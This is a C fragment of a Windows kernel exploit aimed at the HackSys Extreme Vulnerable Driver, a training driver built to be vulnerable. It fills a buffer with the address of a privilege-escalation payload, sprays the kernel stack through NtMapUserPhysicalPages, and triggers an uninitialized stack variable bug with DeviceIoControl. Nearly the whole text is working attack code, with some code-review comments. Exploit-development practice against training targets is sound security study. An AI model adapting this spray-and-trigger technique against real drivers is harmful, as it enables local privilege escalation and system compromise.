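__try {
    // Result of the trigger IOCTL and its error code, recorded right after the
    // call and reported only once the kernel-mode section is over (see below).
    BOOL Triggered = FALSE;
    DWORD TriggerError = ERROR_SUCCESS;

    // Open the driver's device object. GetDeviceHandle() is defined elsewhere;
    // this code treats INVALID_HANDLE_VALUE as its failure value and exits.
    DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
    DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

    hFile = GetDeviceHandle(FileName);

    if (hFile == INVALID_HANDLE_VALUE) {
        DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    // HANDLE is pointer-sized, so it is printed with %p (not %X) to avoid a
    // format/argument mismatch and truncation on 64-bit builds.
    DEBUG_INFO("\t\t[+] Device Handle: 0x%p\n", hFile);

    DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
    DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

    // Zero-filled heap buffer; its contents are what the spray below copies
    // towards the kernel stack.
    StackSprayBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
                                         HEAP_ZERO_MEMORY,
                                         StackSprayBufferSize);

    if (!StackSprayBuffer) {
        DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", StackSprayBuffer);
    DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", StackSprayBufferSize);

    DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

    // Fill every slot of the buffer with the payload address.
    // NOTE(review): the buffer is PULONG and the payload is cast to ULONG, while
    // the slot count is derived from sizeof(ULONG_PTR). These only agree on x86,
    // which this build presumably targets; on x64 the cast would truncate the
    // pointer and only half of the buffer would be written — confirm the target.
    for (i = 0; i < StackSprayBufferSize / sizeof(ULONG_PTR); i++) {
        StackSprayBuffer[i] = (ULONG)EopPayload;
    }

    DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

    ResolveKernelAPIs();

    DEBUG_INFO("\t\t[+] Spraying the Kernel Stack\n");
    DEBUG_MESSAGE("\t[+] Triggering Use of Uninitialized Stack Variable\n");

    OutputDebugString("****************Kernel Mode****************\n");

    // HackSys Extreme Vulnerable driver itself provides a decent interface
    // to spray the stack using Stack Overflow vulnerability. However, j00ru
    // on his blog disclosed a Windows API that can be used to spray stack up to
    // 1024 * sizeof(ULONG_PTR) bytes (http://j00ru.vexillium.org/?p=769). Since
    // it's a Windows API and available on Windows by default, I decided to use
    // it instead of this driver's Stack Overflow interface.
    // Its return value is not examined here; the side effect on the kernel
    // stack described above is all that is relied on.
    NtMapUserPhysicalPages(NULL, 1024, StackSprayBuffer);

    // Kernel Stack should not be used for anything else as it
    // will corrupt the current sprayed state. So, we will directly
    // trigger the vulnerability without putting any Debug prints.
    // For the same reason the result is only captured here and reported after
    // the closing kernel-mode marker.
    Triggered = DeviceIoControl(hFile,
                                HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE,
                                (LPVOID)&MagicValue,
                                0,
                                NULL,
                                0,
                                &BytesReturned,
                                NULL);
    // Saved immediately: the OutputDebugString below may overwrite last-error.
    TriggerError = Triggered ? ERROR_SUCCESS : GetLastError();

    OutputDebugString("****************Kernel Mode****************\n");

    if (!Triggered) {
        DEBUG_ERROR("\t\t[-] DeviceIoControl Failed: 0x%X\n", TriggerError);
    }

    HeapFree(GetProcessHeap(), 0, (LPVOID)StackSprayBuffer);
    StackSprayBuffer = NULL;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
    // GetExceptionCode() identifies the exception that reached this handler;
    // GetLastError() is unrelated to SEH and would report stale state.
    DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetExceptionCode());
    exit(EXIT_FAILURE);
}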